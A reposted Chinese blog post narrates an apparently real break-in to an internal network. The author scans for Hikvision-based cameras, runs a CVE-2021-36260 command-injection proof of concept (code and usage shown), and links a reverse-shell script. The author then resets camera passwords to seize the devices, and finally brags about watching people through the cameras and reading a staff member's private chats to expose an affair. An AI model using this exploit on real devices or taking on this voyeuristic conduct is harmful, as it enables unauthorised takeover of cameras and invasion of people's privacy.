实战安全研究
微信号 gh_f390fc63c711
功能介绍 我们都是网络安全爱好者,专注于网络安全技术。主要以实战讲述web渗透,代码审计和内网渗透,偶尔poc/exp开发和分享,未来主要关注Java安全。
__发表于
收录于合集
以下文章来源于X安全实验室 ,作者a16
探索网络安全潜能!分享渗透测试技巧、代码审计,漏洞分析,最新威胁情报,涵盖AI、区块链等领域。保护数字世界,共筑坚不可摧堡垒。网络安全爱好者与普通用户皆欢迎一二线大厂|实习|内推|安全|前端|后端|运维国护|省护|攻防演练|红队|蓝队
进入内网 使用scan进行 172整个A段的扫描 发现大量的Hikvision IP Camera。但是使用浏览器访问页面,发现是竞业达。经过谷歌搜索,发现竞业达使用的就是海康威视的产品,只不过套了一个壳。
知道是海康威视之后,就可以直接用poc来打了。
我这里用 CVE-2021-36260这个脚本来打 。项目地址如下 https://github.com/Cuerz/CVE-2021-36260/blob/main/CVE-2021-36260.py
headers = {
"host": f'{host}:{port}',
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36",
'Accept': '*/*',
'X-Requested-With': 'XMLHttpRequest',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8'
}
data = '<?xml version="1.0" encoding="UTF-8"?>' \
f'<language>$(>webLib/cu)</language>'
try:
resp1 = requests.put(url=origin_url + '/SDK/webLanguage', headers=headers, data=data, timeout=3, verify=False)
resp2 = requests.get(origin_url + '/cu')
if resp2.status_code == 200:
print(GREEN + f'[!] {url} is verified exploitable\n')
return True
else:
print(BLUE + f'[+] Remote is not vulnerable (Code: {resp2.status_code})\n')
return False
except:
print(RED + f'[-]Cannot connect to ' + url + '\n')
使用方法:
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --check
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --cmd "ls -la"
python ./CVE-2021-36260.py -f target.txt
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Start scanning url
-f FILE, --file FILE read the url from the file
--check Check if vulnerable
--cmd CMD execute cmd (i.e: "ls -l")
上面的脚本只能检测 但是如果需要反弹shell 进一步利用 需要用到这个脚本 https://github.com/Aiminsun/CVE-2021-36260/blob/main/CVE-2021-36260.py 。反弹shell之后,得到的是一个psh,这个psh只能执行一些内部自带的命令(我太菜了),但是查看摄像头足以,直接执行restpassword。然后重新刷新网页,就会提示你设置新的账号密码。下面来欣赏一下效果吧!
这次的目标有大量的海康威视,运气不错。不足的是只拿到了pth,只能执行一些内部自带的命令(我还是太菜了)。后续还有很多实战,碰到的事情也很有意思,比如摄像头刚好看到小树林的事情,运维人员在办公电脑上聊天被我抓到出轨的证据,这里先发一张图预热一下,明天吃瓜.
预览时标签不可点
微信扫一扫
关注该公众号
知道了
微信扫一扫
使用小程序
取消 允许
取消 允许
: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看